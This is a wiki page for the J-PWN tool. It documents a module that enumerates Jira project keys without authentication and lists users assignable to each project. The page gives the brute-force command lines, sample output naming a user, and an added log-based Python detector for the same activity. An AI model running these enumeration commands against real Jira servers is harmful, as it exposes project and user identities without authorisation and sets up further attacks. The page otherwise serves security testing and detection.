Unauthenticated Projectkey Enumeration & Users Assignable to Projects - carnal0wnage/J-PWN GitHub Wiki

Category: [Info Disclosure | Enumeration]

[CG] This module attempts to brute-force project key names, unauthenticated, against the URL: /rest/api/2/user/assignable/multiProjectSearch?projectKeys=$PROJECTKEY. A 200 response confirms the project key exists and returns the list of users assignable to that project; a 404 means the key was not found.

module name: check_unauthenticated_projectkey_enumeration

url: /rest/api/2/user/assignable/multiProjectSearch?projectKeys=$PROJECTKEY

Examples:

Brute-force two-letter project keys, AA through ZZ (--start_id 2 --end_id 2 sets the key length to 2):

python3 j-pwn.py --single https://JIRASERVER --module check_unauthenticated_projectkey_enumeration --path /jira/ --start_id 2 --end_id 2

Brute-force two- and three-letter project keys, AA through ZZZ (--start_id 2 --end_id 3 covers key lengths 2 and 3):

python3 j-pwn.py --single https://JIRASERVER --module check_unauthenticated_projectkey_enumeration --path /jira/ --start_id 2 --end_id 3

Example run:

[Testing URL]: https://JIRASERVER/jira/rest/api/2/user/assignable/multiProjectSearch?projectKeys=ES

+ Found ProjectKey: ES | URL: https://JIRASERVER/jira/rest/api/2/user/assignable/multiProjectSearch?projectKeys=ES

  Enumerated Users:
    - Username: addon_com.gliffy.integration.jira
      Display Name: Gliffy Diagrams for JIRA Cloud
      Key: addon_com.gliffy.integration.jira
      Time Zone: America/New_York
      Active: True
    - Username: addon_com.javahollic.jira.jemh-ui
      Display Name: JEMHCloud Add-On
      Key: addon_com.javahollic.jira.jemh-ui
      Time Zone: America/New_York
      Active: True
    - Username: pvirk
      Display Name: Prabhjeet
      Key: pvirk
      Time Zone: America/New_York
      Active: True


[Testing URL]: https://JIRASERVER/jira/rest/api/2/user/assignable/multiProjectSearch?projectKeys=FE
- No ProjectKey Enumeration vulnerability detected for ProjectKey: FE
- HTTP Status Code: 404

+ Vulnerabilities Found:
+ [Info Disclosure - Project Enumeration] Found ProjectKey: VL | URL: https://JIRASERVER/jira/rest/api/2/user/assignable/multiProjectSearch?projectKeys=VL
+ [Info Disclosure - Project Enumeration] Found ProjectKey: AW | URL: https://JIRASERVER/jira/rest/api/2/user/assignable/multiProjectSearch?projectKeys=AW
+ [Info Disclosure - Project Enumeration] Found ProjectKey: ES | URL: https://JIRASERVER/jira/rest/api/2/user/assignable/multiProjectSearch?projectKeys=ES
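The request pattern in the run above (one anonymous client, many distinct projectKeys values, mostly 404s with a few 200s) is easy to spot in the reverse-proxy or Tomcat access log. The following detector is an added example, not part of J-PWN; the log lines are constructed in combined-log format, the IPs and key names are made up, and the threshold of four distinct keys is an assumption to tune for your environment.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (combined-log style); not real traffic.
# Anonymous requests carry "-" in the authenticated-user field.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /jira/rest/api/2/user/assignable/multiProjectSearch?projectKeys=AA HTTP/1.1" 404 83
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /jira/rest/api/2/user/assignable/multiProjectSearch?projectKeys=AB HTTP/1.1" 404 83
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /jira/rest/api/2/user/assignable/multiProjectSearch?projectKeys=ES HTTP/1.1" 200 1912
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /jira/rest/api/2/user/assignable/multiProjectSearch?projectKeys=FE HTTP/1.1" 404 83
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /jira/rest/api/2/user/assignable/multiProjectSearch?projectKeys=VL HTTP/1.1" 200 2048
10.0.0.9 - alice [01/Jan/2024:10:05:00 +0000] "GET /jira/rest/api/2/user/assignable/multiProjectSearch?projectKeys=ES HTTP/1.1" 200 1912
10.0.0.9 - alice [01/Jan/2024:10:05:04 +0000] "GET /jira/browse/ES-12 HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
ENDPOINT = "/rest/api/2/user/assignable/multiProjectSearch"


def detect_projectkey_enumeration(log_text, min_distinct_keys=4):
    """Return {ip: stats} for clients whose traffic to the multiProjectSearch
    endpoint looks like key enumeration: many distinct projectKeys values.
    stats: tried (distinct keys), not_found (404s), disclosed (keys that
    returned 200, i.e. whose assignable users were handed out), anonymous
    (True if any of the requests were unauthenticated)."""
    per_ip = defaultdict(lambda: {"tried": set(), "not_found": 0, "disclosed": [], "anonymous": False})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlparse(m["target"])
        if not url.path.endswith(ENDPOINT):
            continue
        stats = per_ip[m["ip"]]
        if m["user"] == "-":
            stats["anonymous"] = True
        # projectKeys may be repeated or comma-separated; flatten to single keys.
        for key in ",".join(parse_qs(url.query).get("projectKeys", [])).split(","):
            if not key:
                continue
            stats["tried"].add(key)
            if m["status"] == "404":
                stats["not_found"] += 1
            elif m["status"] == "200" and key not in stats["disclosed"]:
                stats["disclosed"].append(key)
    return {ip: {**s, "tried": len(s["tried"])}
            for ip, s in per_ip.items() if len(s["tried"]) >= min_distinct_keys}
```

A hit with anonymous set to True and a non-empty disclosed list is the condition this module reports; a hit from an authenticated user with a single key (like alice above) is normal Jira use and stays below the threshold.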

References: https://developer.atlassian.com/cloud/jira/platform/rest/v2/api-group-user-search/#api-rest-api-2-user-assignable-multiprojectsearch-get